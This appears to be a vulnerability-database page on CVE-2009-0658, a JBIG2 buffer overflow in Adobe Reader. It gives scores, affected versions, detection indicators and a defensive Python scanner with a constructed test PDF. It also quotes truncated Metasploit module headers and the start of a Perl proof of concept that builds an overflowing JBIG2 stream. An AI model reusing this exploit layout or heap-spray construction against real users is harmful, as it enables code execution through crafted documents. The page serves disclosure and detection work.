CVE-2009-0658
Published: 2009-02-20
Priority: P1 · 80 · high
CVSS 3.1: 7.8 (AV:L / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H)
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 87.72% (99.7th percentile)
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | acrobat | — | — |
| adobe | acrobat | 7.0 – 7.1.1 | — |
| adobe | acrobat | 8.0 – 8.1.4 | — |
| adobe | acrobat_reader | — | — |
| adobe | acrobat_reader | >= 7.0 < 7.1.1 | 7.1.1 |
| adobe | acrobat_reader | 7.0 – 7.1.1 | — |
| adobe | acrobat_reader | >= 8.0 < 8.1.3 | 8.1.3 |
| adobe | acrobat_reader | 8.0 – 8.1.4 | — |
| adobe | acrobat_reader | >= 9.0 < 9.1 | 9.1 |
Detection & IOCs (extracted from sources)
Bytes:
\x00\x00\x00\x01 + $size (\x40\x00) + $factor (ABCD) + \x13 + 'A' x 8314
- Detect PDF files containing a JBIG2Decode filter stream with FlateDecode and ASCIIHexDecode encoding layers: the specific filter chain used in CVE-2009-0658 exploitation.
- Detect PDF files with embedded JavaScript objects whose concatenated variable names exhibit high entropy, a heap-spray obfuscation indicator for this exploit.
- Detect reverse TCP connect-back shellcode embedded inside unescape() calls within compressed JavaScript objects in PDF files.
- The exploit PDF uses a crafted JBIG2 stream starting with bytes \x00\x00\x00\x01 followed by a 2-byte size field and a 4-byte factor field; look for this byte pattern inside JBIG2Decode stream objects.
- The Metasploit module targets return addresses in BIB.dll; monitor for PDF-triggered code execution that pivots through BIB.dll at the documented return addresses.
- The exploit was delivered in the wild by Trojan.Pidief.E; AV/EDR detections for this family name indicate active exploitation of CVE-2009-0658.
- Caveat: the Metasploit module's heap spray uses randomized JavaScript variable names to evade static string matching; signature-based detection on variable names alone will miss obfuscated variants.
- Caveat: the exploit PDF uses multiple stacked encoding layers (FlateDecode + ASCIIHexDecode + JBIG2Decode); detection engines must inflate and decode all layers before inspecting the JBIG2 stream content.
- Caveat: the Metasploit JBIG2 module contained a bug that was discovered and fixed during research; older Metasploit-generated samples may differ from the current exploit structure.
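The three indicators above (the stacked filter chain, the PoC's JBIG2 byte layout, and the high-entropy heap-spray identifiers) only work if the scanner actually peels every encoding layer first. The following is an added example, written for this page and not taken from the VRT, Metasploit or any vendor tool: a small Python scanner that walks the stream objects of a PDF, decodes FlateDecode and ASCIIHexDecode layers in order, stops at JBIG2Decode, and applies the checks. It is deliberately simplified (regex object parsing, no xref or object-stream handling, no nested dictionaries), the 4.0 bits/char entropy cut-off and the 32-unit unescape() threshold are assumptions to tune on your own corpus, and both sample PDFs, including the `%u9090` filler that stands in for a shellcode blob, are constructed inline.

```python
import math
import re
import zlib
from collections import Counter

# ---- constructed samples (not real malware) ----------------------------------
def make_pdf(streams):
    """Assemble a minimal PDF body from (dictionary, raw-stream-bytes) pairs.
    No xref table is written; the result is meant for the scanner below only."""
    out = [b"%PDF-1.5\n"]
    for num, (dictionary, data) in enumerate(streams, start=4):
        out.append(b"%d 0 obj\n<< /Length %d %s >>\nstream\n" % (num, len(data), dictionary))
        out.append(data + b"\nendstream\nendobj\n")
    out.append(b"%%EOF\n")
    return b"".join(out)

def build_malicious_pdf():
    # JBIG2 payload laid out like the public PoC: 00 00 00 01, 2-byte size,
    # 4-byte factor, 0x13, then a long run of 'A' (constructed, not the real file).
    jbig2 = b"\x00\x00\x00\x01" + b"\x40\x00" + b"ABCD" + b"\x13" + b"A" * 8314
    # Encode in the reverse of decode order: JBIG2 -> ASCIIHex -> Flate.
    layered = zlib.compress(jbig2.hex().encode() + b">")
    sled = b"%u9090" * 40  # constructed filler standing in for a %u blob; not shellcode
    js = (b'var qZx9Lm3v = unescape("' + sled + b'");\n'
          b'var Wk7pR2tB = qZx9Lm3v;\n'
          b'while (Wk7pR2tB.length < 0x80000) Wk7pR2tB += Wk7pR2tB;\n'
          b'var h3Jd8QsY = new Array();\n'
          b'for (var i = 0; i < 200; i++) h3Jd8QsY[i] = Wk7pR2tB;\n')
    return make_pdf([
        (b"/Filter [/FlateDecode /ASCIIHexDecode /JBIG2Decode] /Width 64 /Height 64", layered),
        (b"/Filter /FlateDecode", zlib.compress(js)),
    ])

def build_benign_pdf():
    js = (b"var total = 0; var count = 10;\n"
          b"for (var index = 0; index < count; index++) { total += index; }\n"
          b'app.alert("sum=" + total);\n')
    return make_pdf([
        (b"/Filter /FlateDecode", zlib.compress(b"BT /F1 12 Tf (hello) Tj ET")),
        (b"/Filter /FlateDecode", zlib.compress(js)),
    ])

# ---- scanner ------------------------------------------------------------------
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\s*<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
FILTER_RE = re.compile(rb"/Filter\s*(?:\[([^\]]*)\]|(/\w+))")
NAME_RE = re.compile(rb"/(\w+)")
JS_RE = re.compile(rb"\b(?:var|function)\b")
STRING_RE = re.compile(rb'"[^"\n]*"|\'[^\'\n]*\'')
IDENT_RE = re.compile(rb"\b[A-Za-z_$][A-Za-z0-9_$]*\b")
UNESCAPE_RE = re.compile(rb"unescape\(\s*[\"']((?:%u[0-9A-Fa-f]{4})+)[\"']\s*\)")
LONG_RUN_RE = re.compile(rb"(.)\1{1023,}", re.S)
JS_KEYWORDS = {b"var", b"for", b"while", b"if", b"else", b"new", b"function", b"return",
               b"in", b"do", b"this", b"unescape", b"length", b"Array", b"String"}
JBIG2_HEADER = b"\x00\x00\x00\x01"          # opening bytes of the public PoC stream
ENTROPY_THRESHOLD = 4.0                      # assumed cut-off in bits/char
SUSPICIOUS_CHAIN = ["FlateDecode", "ASCIIHexDecode", "JBIG2Decode"]

def filter_chain(dictionary):
    """Return /Filter names in decode order (PDF decodes the first-listed first)."""
    m = FILTER_RE.search(dictionary)
    if not m:
        return []
    names = m.group(1) if m.group(1) is not None else m.group(2)
    return [n.decode() for n in NAME_RE.findall(names)]

def ascii_hex_decode(data):
    body = re.sub(rb"\s+", b"", data.split(b">", 1)[0])
    if len(body) % 2:
        body += b"0"  # a trailing odd hex digit is padded with 0
    return bytes.fromhex(body.decode("ascii"))

def peel(data, chain):
    """Undo Flate/ASCIIHex layers in order; stop at the first filter that is not a
    pure encoding (JBIG2Decode) or that fails, returning data plus what is left."""
    for i, name in enumerate(chain):
        try:
            if name == "FlateDecode":
                data = zlib.decompress(data)
            elif name == "ASCIIHexDecode":
                data = ascii_hex_decode(data)
            else:
                return data, chain[i:]
        except (zlib.error, ValueError):
            return data, chain[i:]
    return data, []

def jbig2_run_length(payload):
    """PoC-layout check: 00 00 00 01 header plus a long single-byte run; 0 = no match."""
    if not payload.startswith(JBIG2_HEADER):
        return 0
    m = LONG_RUN_RE.search(payload)
    return m.end() - m.start() if m else 0

def shannon_entropy(data):
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def identifier_entropy(js):
    """Entropy of the unique identifier names, concatenated, after dropping string
    literals and common keywords/builtins."""
    seen = []
    for ident in IDENT_RE.findall(STRING_RE.sub(b'""', js)):
        if ident not in JS_KEYWORDS and ident not in seen:
            seen.append(ident)
    return shannon_entropy(b"".join(seen)), seen

def scan_pdf(pdf):
    findings = []
    for m in OBJ_RE.finditer(pdf):
        obj, chain = m.group(1).decode(), filter_chain(m.group(2))
        if chain == SUSPICIOUS_CHAIN:
            findings.append((obj, "filter-chain", "+".join(chain)))
        payload, rest = peel(m.group(3), chain)
        if rest and rest[0] == "JBIG2Decode":
            run = jbig2_run_length(payload)
            if run:
                findings.append((obj, "jbig2-poc-layout", "00000001 header, %d-byte run" % run))
        elif not rest and JS_RE.search(payload):
            ent, names = identifier_entropy(payload)
            if ent > ENTROPY_THRESHOLD:
                findings.append((obj, "js-ident-entropy", "%.2f bits/char over %d names" % (ent, len(names))))
            u = UNESCAPE_RE.search(payload)
            if u and len(u.group(1)) // 6 >= 32:
                findings.append((obj, "js-unescape-blob", "%d %%u units" % (len(u.group(1)) // 6)))
    return findings

if __name__ == "__main__":
    for label, doc in (("malicious", build_malicious_pdf()), ("benign", build_benign_pdf())):
        print(label, scan_pdf(doc))
```

Run as a script to see the constructed malicious sample raise all four findings and the benign sample none. The entropy check works on unique names rather than the whole script, so repetition of one sprayed variable does not drag the score down; the caveat above still applies, since an attacker who draws names from a small alphabet will stay under any fixed threshold, which is why the filter-chain and JBIG2 layout checks run independently of the JavaScript heuristics.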
CVSS provenance
- NVD v3.1: 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
- NVD v2.0: 9.3, High on the v2 scale (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- VulnCheck: 7.8 HIGH
- Red Hat (vendor): 7.8 HIGH
GHSA
GHSA-wr9v-3qgm-q33g · ghsa_unreviewed · 2022-05-02 · CVSS 7.8 · CVE-2009-0927 [HIGH] · CWE-121
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
GHSA
GHSA-pm5j-jrq9-vmhx · ghsa_unreviewed · 2022-05-02 · CVE-2009-0658 [HIGH] · CWE-119
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
VulnCheck
Adobe Acrobat and Reader Improper Restriction of Operations within the Bounds of a Memory Buffer · vulncheck · 2009 · CVSS 7.8 · CVE-2009-0658 [HIGH]
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
Affected: Adobe Acrobat and Reader
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2009-0658; https://users.ece.cmu.edu/~tdumitra/public_documents/bilge12_zero_day.pdf
Red Hat
security flaw · vendor_redhat · 2009-03-18 · CVSS 7.8 · CVE-2009-0927 [HIGH]
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
Red Hat
acroread: multiple JBIG2-related security flaws · vendor_redhat · 2009-02-19 · CVSS 7.8 · CVE-2009-0658 [HIGH]
Buffer overflow in Adobe Reader 9.0 and earlier, and Acrobat 9.0 and earlier, allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call and possibly an embedded JBIG2 image stream, as exploited in the wild in February 2009 by Trojan.Pidief.E.
No detection rules found.
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2) · exploitdb · 2010-09-25 · CVE-2009-0658
---
##
# $Id: adobe_jbig2decode.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort',
Exploit-DB
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1) · exploitdb · 2010-06-15 · CVE-2009-0658
---
##
# $Id: adobe_jbig2decode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit',
'Description' => %q{
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
This module relies upon javascript for the heap spray.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Metasploit implementation
'natron',
# bl4cksecurity blog explanation of vuln [see References]
'xort
Exploit-DB
Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2) · exploitdb · 2009-02-23 · CVE-2009-0658
---
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
print pdf();
sub pdf()
{
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0 \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n" .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"t
Metasploit
Adobe JBIG2Decode Memory Corruption · metasploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Metasploit
Adobe JBIG2Decode Heap Corruption · metasploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Bugzilla
CVE-2009-0927 security flaw · bugzilla · 2018-08-16 · CVSS 7.8 · CVE-2009-0927 [HIGH]
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
Bugzilla
Ghostscript: Multiple NULL pointer dereferences in JBIG2 decoder · bugzilla · 2009-06-02 · CVSS 7.8 · CVE-2009-0658 [HIGH]
Multiple NULL pointer dereference deficiencies were found in Ghostscript's JBIG2 compression format decoder. Opening a specially-crafted Portable Document Format (PDF) file would cause "pdf2ps" to crash.
Note: This bug was discovered by the PoC provided for the Adobe Reader 9.0 and Adobe Acrobat 9.0 CVE-2009-0658 flaw.
PoC:
http://milw0rm.com/sploits/2009-41414141.pdf
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
http://www.milw0rm.com/exploits/8090
http://www.milw0rm.com/exploits/8099
http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html
http://milw0rm.com/exploits/8280
http://www.adobe.com/support/security/bulletins/apsb09-04.html
http://www.adobe.com/support/secu
Bugzilla
CVE-2009-0658, CVE-2009-0193, CVE-2009-0928, CVE-2009-1061, CVE-2009-1062 acroread: multiple JBIG2-related security flaws · bugzilla · 2009-02-23 · CVSS 9.3 · CVE-2009-0658 [CRITICAL]
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-0658 to the following vulnerability:
Buffer overflow in Adobe Reader 9.0 and earlier and Acrobat 9.0 and earlier allows remote attackers to execute arbitrary code via a crafted PDF document, related to a non-JavaScript function call, as exploited in the wild in February 2009 by Trojan.Pidief.E.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
http://isc.sans.org/diary.html?n&storyid=5902
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219
http://www.symantec.com/security_response/writeup.jsp?docid=2009-021212-5523-99&tabid=2
http://www.adobe.com/support/security/ad
Talos
A New Detection Framework · blogs_talos · 2010-04-22
We just completed a talk here in Dubai on some detection capability research the VRT has been doing. The subtitle of the presentation, "What would you do with a pointer and a size?" pretty much sums up the potential of the project. It all started last December at the SANS IDS conference. In talking to both attendees and presenters, it became clear there was a lack of capability for high-end security and response personnel. Repeatedly we were asked about providing a greater depth of detection, dropping a file to disk for longer analysis and logging packets for an extended period of time. In short, there were solutions needed that weren't being provided.
So Patrick Mullen and I sat down and started fiddling with some ideas. I worked on deep parsing and detection on PDF files and Patrick wor
References
http://isc.sans.org/diary.html?n&storyid=5902
http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.html
http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00010.html
http://osvdb.org/52073
http://secunia.com/advisories/33901
http://secunia.com/advisories/34392
http://secunia.com/advisories/34490
http://secunia.com/advisories/34706
http://secunia.com/advisories/34790
http://security.gentoo.org/glsa/glsa-200904-17.xml
http://sunsolve.sun.com/search/document.do?assetkey=1-66-256788-1
http://www.adobe.com/support/security/advisories/apsa09-01.html
http://www.adobe.com/support/security/bulletins/apsb09-04.html
http://www.kb.cert.org/vuls/id/905281
http://www.redhat.com/support/errata/RHSA-2009-0376.html
http://www.securityfocus.com/bid/33751
http://www.securitytracker.com/id?1021739
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219
http://www.symantec.com/security_response/writeup.jsp?docid=2009-021212-5523-99&tabid=2
http://www.us-cert.gov/cas/techalerts/TA09-051A.html
http://www.vupen.com/english/advisories/2009/0472
http://www.vupen.com/english/advisories/2009/1019
https://exchange.xforce.ibmcloud.com/vulnerabilities/48825
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5697
https://www.exploit-db.com/exploits/8090
https://www.exploit-db.com/exploits/8099